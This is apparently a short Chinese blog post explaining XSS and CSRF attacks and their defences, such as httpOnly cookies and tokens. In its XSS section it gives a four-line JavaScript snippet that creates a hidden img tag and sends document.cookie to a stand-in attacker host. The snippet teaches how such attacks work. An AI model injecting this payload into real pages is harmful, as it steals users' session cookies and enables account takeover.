前端网络安全

本文探讨了跨站脚本(XSS)攻击的原理,如何通过创建隐藏的img标签窃取Cookie,以及防范措施——httpOnly。同时介绍了CSRF攻击的原理,涉及冒充用户和防御手段,包括限制第三方访问Cookie和使用验证信息。
摘要由CSDN通过智能技术生成

1 XSS攻击(跨站脚本攻击 Cross Site Scripting)
XSS指攻击者添加代码嵌入到页面中,使用户访问时都会执行相应的嵌入代码,从而盗取用户资料、利用用户身份进行一系列侵害操作。(利用虚假输入表单骗取用户个人信息盗取账号等)

解决办法:客户端提交的数据先进行相应的过滤处理后再进行下一步的操作。

最常见 xss 攻击是读取 Cookie(来访问用户的账号)

var img = document.createElement('img')
img.src='http://www.xss.com?cookie=' + document.cookie
img.style.display='none'
document.getElementsByTagName('body')[0].appendChild(img)

防御: httpOnly (在服务端文件设置: cookie 中设置 HttpOnly 属性后,js脚本将无法读取到 cookie 信息)

2 CSRF(跨站请求伪造 Cross-site request forgery)
冒充用户发起请求,完成一些违背用户意愿的事情(如删初评论,转账等等)。
原理就是攻击者伪造请求并诱导用户点击,然后将伪造的请求和用户身份认证信息发送到后端。如果用户是在登录状态下的话,后端就以为是用户在操作,从而进行相应的逻辑处理。

完成一次CSRF攻击,受害者必须依次完成两个步骤:
1 登录受信任的网站,并生成Cookie
2 在不登出信任网站的情况下,访问危险网站

防御
(1)不让第三方网站访问Cookie,阻止第三方网站请求接口
(2)请求时附带验证信息(比如验证码或者Token

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

敲起来blingbling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值